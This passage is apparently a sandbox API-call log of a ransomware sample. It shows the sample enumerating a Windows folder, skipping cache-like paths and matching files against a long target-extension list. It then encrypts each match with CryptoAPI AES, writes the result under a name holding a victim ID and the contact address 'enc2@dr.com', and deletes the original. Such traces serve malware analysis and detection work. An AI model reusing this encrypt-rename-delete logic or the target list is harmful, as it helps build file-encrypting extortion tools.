	[0171.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="tmp") returned 0x0
	[0171.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="cache") returned 0x0
	[0171.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="webcache") returned 0x0
	[0171.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="inetcache") returned 0x0
	[0171.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="nvidia") returned 0x0
	[0171.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="packages") returned 0x0
	[0171.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="cookies") returned 0x0
	[0171.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="programdata") returned 0x0
	[0171.445] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.445] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f6b62d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f6b62d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0f6b62d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe90, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0171.445] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0171.445] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0171.445] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\"
	[0171.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"
	[0171.445] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned 99
	[0171.446] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.446] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned 0x63
	[0171.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.446] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"
	[0171.446] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned 99
	[0171.446] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.448] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.448] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.448] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.449] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.449] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.449] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0xe90, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0xe90, lpOverlapped=0x0) returned 1
	[0171.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.454] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0171.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.457] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0171.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.457] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.457] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95f0) returned 1
	[0171.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.458] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xe90, dwBufLen=0xe90 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xea0) returned 1
	[0171.458] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.458] RtlMoveMemory (in: Destination=0xfdf020, Source=0xfde188, Length=0xe90 | out: Destination=0xfdf020) 
	[0171.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.458] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf020*, pdwDataLen=0x18a1ec*=0xe90, dwBufLen=0xea0 | out: pbData=0xfdf020*, pdwDataLen=0x18a1ec*=0xea0) returned 1
	[0171.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.459] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0171.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.459] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0171.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.460] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0171.460] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.460] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.461] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0171.462] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0171.462] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.463] WriteFile (in: hFile=0x39c, lpBuffer=0xfdf020*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdf020*, lpNumberOfBytesWritten=0x18a648*=0xea0, lpOverlapped=0x0) returned 1
	[0171.467] CloseHandle (hObject=0x39c) returned 1
	[0171.468] CloseHandle (hObject=0x390) returned 1
	[0171.468] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml")) returned 1
	[0171.471] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml")) returned 0
	[0171.472] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0171.472] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0171.472] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0171.472] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\"
	[0171.472] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml"
	[0171.472] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml") returned 100
	[0171.472] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.473] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml") returned 0x64
	[0171.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.473] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.473] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"
	[0171.473] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml") returned 100
	[0171.473] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.474] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.474] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.l